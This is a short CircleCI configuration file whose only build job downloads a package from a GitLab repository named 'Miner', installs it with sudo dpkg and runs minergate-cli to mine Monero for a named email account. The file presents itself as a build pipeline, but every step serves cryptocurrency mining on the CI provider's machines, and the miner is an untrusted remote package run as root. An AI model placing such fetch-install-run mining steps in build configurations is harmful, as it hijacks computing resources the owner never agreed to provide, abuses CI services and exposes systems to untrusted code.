version: 2
jobs:
  build:
    machine: true

    steps:
      - run: wget https://gitlab.com/Yoginth/Miner/raw/master/yogi-cli.deb -O yogi-cli.deb
      - run: sudo dpkg -i yogi-cli.deb
      - run: minergate-cli -user yoginth@aol.com xmr
